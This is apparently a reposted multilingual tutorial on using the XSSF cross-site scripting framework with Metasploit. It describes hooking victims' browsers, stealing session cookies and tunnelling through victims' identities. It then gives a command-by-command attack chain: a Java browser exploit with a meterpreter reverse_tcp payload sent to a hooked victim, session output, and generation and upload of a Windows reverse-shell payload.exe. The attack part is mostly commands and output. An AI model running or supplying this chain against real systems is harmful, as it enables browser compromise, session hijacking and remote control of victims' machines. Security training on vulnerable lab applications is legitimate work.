XSSF - Cross Site Scripting Framework

        跨站腳本框架 (XSSF) 是一個設計用來快速發現網站存在XSS漏洞的一個安全工具集。 該項目是爲了驗證網站存在的XSS漏洞及是被如何利用的。

        XSSF容許同目標瀏覽器（一個存在XSS漏洞的）建立通訊通道來實施攻擊。用戶能夠免費選擇已經存在的攻擊模塊來對目標瀏覽器實施攻擊。

        （英文太差，懶得翻譯了，轉成英文後大夥應該都能看懂。）
        Xssf Framework allows you to manage victims of XSS attacks and generic persists victims a connection with them through a "loop" in javascript, which is responsible for sending requests reverse at defined intervals of time in order to execute exploits against the victim.

        

        To use xssf in metasploit is necessary to locate a vulnerable application to XSS attacks, to test and improve skills in the field of web application security, there is a project called DVWA (Damn Vulnerable Web Application) is an application written in PHP MySQL and has enabled a number of vulnerabilities that allows a security professional, interact with the application and understanding of possible attacks that can be done in web applications.


        XSSF documented provides a powerful API, which facilitates the development of modules and attacks. In addition, their integration into the Metasploit Framework allows users to start the MSF browser based exploit easilly XSS vulnerability.

        Exploiting a XSS bug in the victim's browser could be to browse website on attacker's browser, using the victim's session connected. In most cases, simply stealing the victim cookie will be sufficient to do this.

        However, in a few cases (intranet, network tools portals, etc.), the cookie will not be useful for an external attacker. That's why XSSF Tunnel was created to help the attacker to help the attacker browsing on affected domain using the victim's session.

        With XSS we can create a tunnel that will allow us to connect our victim from a web browser, the basic idea was to create a tunnel to serve as a proxy for communication between the application XSS vulnerability exploited and the attacker passed between the victim, in this way you can run some additional attack without revealing the identity of the attacker and using the identity of the victim.

        The new version 4.6.0-dev MSF is supported by:

• Backtrack 5R3

• Ubuntu 12.04

• Kali 1.0 

• Windows 7 

Vulnerabilidades XSS (Cross Site Scripting )

• Cross Site Scripting InDirecto (Reflejado) Reflective XSS

• Cross Site Scripting  Directo (Persistente) 

Manual con ejemplos "XSS for fun and profit"

    It allows: 

       stealing Cookies

        Execute commands (via Javascript)

        Execute attacks Denial of Service (DDoS)

XSSF con Metasploit

msfupdate 
  
cd /opt/metasploit/apps/pro/msf3 
  
svn export http:/xssf.googlecode.com/svn/trunk ./ --force 
  
msfconsole

msf > load xssf Port=80

msf > help xssf

Result of the available commands:

• xssf_active_victims Muestra víctimas activas.

• xssf_add_auto_attack Añade un nuevo ataque automatizado (lanzado de forma automática en la conexión de la víctima).

• xssf_auto_attacks Muestra XSSF ataques automatizados.

• xssf_banner Prints Marco XSS bandera !

• xssf_clean_victims Limpia víctimas en la base de datos ( eliminar ataques de espera).

• xssf_exploit Lanza e introduce un módulo (que se ejecuta en uno de sus procesos ) en una víctima determinada.

• xssf_information Muestra información sobre una víctima determinada.

• xssf_log Muestra registro con un ID dado.

• xssf_logs Muestra los registros sobre una víctima determinada.

• xssf_remove_auto_attack Elimina un ataque automatizado.

• xssf_remove_victims Elimina las víctimas en la base de datos.

• xssf_restore_state Restaura el estado XSSF (víctimas , registros , etc) a partir del archivo de entrada.

• xssf_save_state Guarda estatales XSSF (víctimas , registros , etc) en el archivo de salida.

• xssf_servers Muestra todos los servidores de ataque utilizados.

• xssf_tunnel Nos proporciona un túnel entre agresor y víctima.

• xssf_urls Enumera las direcciones URL's disponibles útiles proporcionadas por XSSF.

• xssf_victims Muestra todas las víctimas 

Example of a victim using Internet Explorer 7 and a vulnerable version of Java in Windows XP.

xssf_victims

        1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES

    xssf_information 1

            [..] 
            BROWSER NAME : Internet Explorer
            BROWSER VERSION : 7.0
            OS NAME : Windows
            OS VERSION : XP
            ARCHITECTURE : ARCH_X86 
            [..]
            

    use exploit/multi/browser/java_atomicreferencearray    
    set PAYLOAD java/meterpreter/reverse_tcp
    set SRVHOST 192.168.23.200
    set URIPATH xssf
    set LHOST 192.168.23.200
    exploit -j
    jobs

        Jobs
        ====
        Id Name
        – —-
        0 Exploit: multi/browser/java_atomicreferencearray
        

    xssf_exploit 1 0

        [*] Searching Metasploit launched module with JobID = ’0′…
        [+] A running exploit exists: ‘Exploit: multi/browser/java_atomicreferencearray’
        [*] Exploit execution started, press [CTRL + C] to stop it !
        [+] Remaining victims to attack: [[1] (1)]
        [+] Code ‘Exploit: multi/browser/java_atomicreferencearray’ sent to victim ’1′
        [+] Remaining victims to attack: NONE

        

    show sessions

        Active sessions
        ===============
        Id Type Information Connection
        – —- ———– ———-
        1 meterpreter java/java victime @ Victim-PC 192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe

use exploit/multi/handler
exploit -j

upload /opt/metasploit/apps/pro/msf3/payload.exe c

background
sessions -i 1

PS:寫文章不易呀，翻譯也挺苦逼，雖然是翻譯成英文，真心敬仰那些翻譯大神！

via:Elhacker